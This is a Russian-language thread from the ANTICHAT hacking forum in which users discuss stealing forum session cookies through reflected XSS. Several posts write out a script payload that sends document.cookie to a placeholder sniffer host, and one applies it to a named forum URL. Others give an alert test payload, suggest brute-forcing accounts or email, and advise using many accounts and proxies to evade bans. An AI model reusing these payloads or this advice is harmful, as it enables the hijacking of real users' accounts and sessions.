ANTICHAT — форум по информационной безопасности, OSINT и технологиям

И тебе не меньше

Супер-хакеры, а возможно пассивной Xss выманить не только айпишник но и кукисы. И еще, может кто-нибуть скажет мне, - есть програмка брутфорс для фастББ?

Я далеко не супер-хакер, но отвечу на твой вопрос =)
С помощью пассивной хсс куки стырить можно. Та хсс, что ты показывал - это и есть пассивная. Смотри внимательней на запрос...
...+document.cookie
Короче то, что мы тебе с goffog сказали - это и тырит куки =)

ЗЫ Насчет брута - честно не знаю. Думаю почту побыстрей будет брутить

а в фастББ значит ета Xss тоже стырит кука? Ели так, то я ОРУ от радости!

То есть запрос будет таков "><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;</script>

А вот если я хочу угнать куку с форума www.qwert.borda.ru то запрос мне нужно писать в таблицу
вот прямо так www.qwert.borda.ru/index.php/"><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;</script> если что не правильно поправте

Гм, ты сказал поправить?.. Если бы все было так просто...
Почитай хотябы пару статей ачатовских про хсс, а то, я вижу, у тебя и представления нету об этом.
Коротко : XSS надо уметь внедрить. Вся суть заключается в том, что вредоносный код внедряется в код страницы, которую запрашивает жертва. Но для этого в фастбб ты должен найти уязвимое место, которое позволило бы это сделать. А вот когда найдешь уже все это дело, то тогда уже и строй запрос к сниферу. Для проверки юзай следующий код :
"><script>alert()</script>
Оно должно выдать алерт. В простонародии - окошко. =)

Я с фастББ не знаком но думаю там тоже есть предварительный просмотр, тоесть смотришь теме что ниже, малехо изменяешь под себя скрипт, заливаешь куда-то и всовуешь жертве. Но админы быстренько все просекут и дадут БАН по АЙПИ, так что зареги по-больше акков и юзай прокси.

goffog, слух, если не уверен, лучше не писать, а то в заблуждение некотыре входят
Кстати на фастбб применяется супербан.
И насчет предварительного просмотра - если он есть, то форум уязвим?

Ну если супербан, то даже программка есть для его обхода, а как я понял, предварительный просмотр, если и есть, то можно стырить куки, а про уязвимости форума я ниче не говорил.